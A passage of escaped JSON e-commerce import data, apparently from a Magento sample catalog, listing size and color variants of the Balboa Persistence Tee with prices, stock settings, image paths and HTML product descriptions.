wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"470\":{\"sku\":\"MS03-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-M-Gray\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms03-gray_alt1.jpg,\\/m\\/s\\/ms03-gray_back.jpg\",\"image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms03-gray_alt1.jpg,\\/m\\/s\\/ms03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"471\":{\"sku\":\"MS03-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-M-Green\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"472\":{\"sku\":\"MS03-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-M-Orange\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"473\":{\"sku\":\"MS03-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-L-Gray\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms03-gray_alt1.jpg,\\/m\\/s\\/ms03-gray_back.jpg\",\"image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms03-gray_alt1.jpg,\\/m\\/s\\/ms03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"474\":{\"sku\":\"MS03-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-L-Green\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"475\":{\"sku\":\"MS03-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-L-Orange\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"476\":{\"sku\":\"MS03-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-XL-Gray\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms03-gray_alt1.jpg,\\/m\\/s\\/ms03-gray_back.jpg\",\"image\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms03-gray_alt1.jpg,\\/m\\/s\\/ms03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"477\":{\"sku\":\"MS03-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-XL-Green\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"balboa-persistence-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"478\":{\"sku\":\"MS03-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Balboa Persistence Tee-XL-Orange\",\"description\":\"<p>The Balboa Persistence Tee is a must-have for any athlete, Philadelphia or elsewhere. We took the best of performance apparel, cut the fluff and boiled it down to the basics for a lightweight, quick-drying t-shirt.<\\/p>\\n<p>&bull; Crew neckline. <br \\/>&bull; Semi-fitted. <br \\/>&bull; Cocona&reg; performance fabric. <br 